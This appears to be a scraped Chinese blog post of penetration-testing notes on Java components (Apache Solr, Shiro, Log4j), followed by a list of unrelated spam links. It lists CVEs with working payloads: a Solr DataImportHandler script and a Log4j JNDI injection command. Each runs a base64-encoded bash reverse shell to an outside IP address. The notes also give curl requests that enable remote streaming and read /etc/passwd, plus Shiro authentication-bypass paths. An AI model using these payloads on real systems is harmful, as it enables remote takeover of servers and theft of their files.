当前位置: 首页 > news >正文

网站建设+公司利用小程序反向做网站

网站建设+公司,利用小程序反向做网站,养老院网站开发背景,开发app应用公司排名知识点#xff1a; 1、J2EE-组件安全-Solr-全文搜索 2、J2EE-组件安全-Shiro-身份验证 3、J2EE-组件安全-Log4J-日志记录 章节点#xff1a; 1、目标判断-端口扫描组合判断信息来源 2、安全问题-配置不当CVE漏洞弱口令爆破 3、复现对象-数据库中间…知识点 1、J2EE-组件安全-Solr-全文搜索 2、J2EE-组件安全-Shiro-身份验证 3、J2EE-组件安全-Log4J-日志记录 章节点 1、目标判断-端口扫描组合判断信息来源 2、安全问题-配置不当CVE漏洞弱口令爆破 3、复现对象-数据库中间件开发框架应用协议 常见语言开发框架 PHPThinkphp Laravel YII CodeIgniter CakePHP Zend等 JAVASpring MyBatis Hibernate Struts2 Springboot等 PythonDjango Flask Bottle Turbobars Tornado Web2py等 JavascriptVue.js Node.js Bootstrap JQuery Angular等 常见语言开发组件(Java) Apache Solr、Apache Shiro、Apache Struts2、Apache Flink、Flume、Dubbo、Redis、Logstash、ElasticSearch、Kafka、Ghidra、Minecraft、Apache hive、Datax、Streaming、Dolphin Scheduler、Storm、Spring、Aibaba FastJson、Jackson、Log4J、XSteam等。 一、演示案例-J2EE-组件Solr-本地demoCVE 主要基于HTTP和Apache Lucene实现的全文搜索服务器。 黑盒特征图标及端口8983 1、命令执行CVE-2019-17558 影响版本 Apache Solr 5.0.0版本至8.3.1利用项目 https://github.com/jas502n/solr_rce D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id2、远程命令执行漏洞(CVE-2019-0193) 影响版本 Apache Solr 8.2.0版本https://vulhub.org/#/environments/solr/CVE-2019-0193/ 条件1 Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用) 条件2 Solr Admin UI未开启鉴权认证。默认情况无需任何认证 选择已有核心后选择Dataimport功能并选择debug模式更改填入以下POC点击Execute with this Confuguration dataConfigdataSource typeURLDataSource/script![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec(bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ}|{base64,-d}|{bash,-i});}]]/scriptdocumententity namestackoverflowurlhttps://stackoverflow.com/feeds/tag/solrprocessorXPathEntityProcessorforEach/feedtransformerscript:poc //document /dataConfig3、Apache Solr 文件读取SSRF (CVE-2021-27905) 全版本官方拒绝修复漏洞 1、获取数据库名 http://47.94.236.117:8983/solr/admin/cores?indexInfofalsewtjson2、访问触发 curl -i -s -k -X $POST \-H $Content-Type: application/json --data-binary ${\set-property\:{\requestDispatcher.requestParsers.enableRemoteStreaming\:true}} \$http://47.94.236.117:8983/solr/demo/config3、任意文件读取 curl -i -s -k http://47.94.236.117:8983/solr/demo/debug/dump?paramContentStreamsstream.urlfile:///etc/passwd二、演示案例-J2EE-组件Shiro-本地demoCVE Java安全框架能够用于身份验证、授权、加密和会话管理。 黑盒特征数据包cookie里面rememberMe 白盒审计看调用的shiro库对应版本是否爆过漏洞1、CVE_2016_4437 Shiro-550Shiro-721(RCE) 影响范围 Apache Shiro 1.2.4工具直接搜哈 2、CVE-2020-11989(身份认证绕过) Poc/admin/%20 影响范围Apache Shiro 1.7.1 3、CVE-2020-1957(身份认证绕过) Poc/xxx/..;/admin/ 影响范围Apache Shiro 1.5.3 4、CVE-2022-32532(身份验证绕过) Poc /permit/any /permit/a%0any可绕过 需要依赖代码具体写法无法自动化风险较低。 影响范围Apache Shiro 1.9.1 三、演示案例-J2EE-组件Log4j-本地demoCVE Apache的一个开源项目是一个基于Java的日志记录框架。 黑盒特征盲打 会问蓝队攻击特征${jndi:rmi:///osutj8}Log4j2远程命令执行CVE-2021-44228 漏洞影响的产品版本包括 Apache Log4j2 2.0 - 2.15.0-rc1修复 1、生成反弹Shell的JNDI注入 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3Lzk5MDAgMD4mMQ}|{base64,-d}|{bash,-i} -A 47.94.236.1172、构造JNDI注入Payload提交 ${jndi:rmi://47.94.236.117:1099/osutj8}%24%7b%6a%6e%64%69%3a%72%6d%69%3a%2f%2f%34%37%2e%39%34%2e%32%33%36%2e%31%31%37%3a%31%30%39%39%2f%6f%73%75%74%6a%38%7d
http://www.zqtcl.cn/news/648863/

相关文章:

  • 南京建设网站维护洛阳最新通告今天
  • 网站名称创意大全wordpress公开课插件
  • 淮安市城市建设档案馆网站可以做网页的软件
  • 网站空间服务器wordpress 排除置顶文章
  • 有域名后怎么做网站邯郸做移动网站的地方
  • 商标可以做网站吗网站开发的大学生应届简历
  • 长沙长沙网站建设公司saas系统架构
  • 成都销售型网站长春财经学院多大
  • 手机自己制作表白网站app项目网络计划图怎么画
  • 品牌网站如何做seo浏览器正能量网址
  • 开封做网站哪家好网页设计制作网站大一素材
  • 河南网站域名备案莱芜新闻电视台节目表
  • 长春网站建设新格做天猫还是做网站推广
  • 新网站建设的感想安阳区号是什么
  • 余姚市城乡建设局网站wordpress 预览插件
  • 游戏开发和网站开发wordpress foreign trade
  • 网站设计 原型图html购物网站模板
  • 谷歌网站推广报价国产搜什么关键词最好看
  • 婚礼网站有哪些个人做网站需要什么条件
  • 深圳企业网站seo人才招聘网站建设
  • 谷歌下载seo是什么软件
  • 个人网站设计分析小程序在线制作平台
  • 网站开发 一般用什么语言vi视觉设计案例
  • 微信公众平台官方网官网seo优化找哪家做
  • 简约 网站模板网站目录链接怎么做
  • 国内地铁建设公司网站大连做网站外包
  • 微网站营销是什么网站图片上传代码
  • 外包公司做网站多少用vs做的网站怎么打开
  • 兴义城乡建设部网站企业服务器配置方案
  • 淘宝客网站根目录wordpress调用导航代码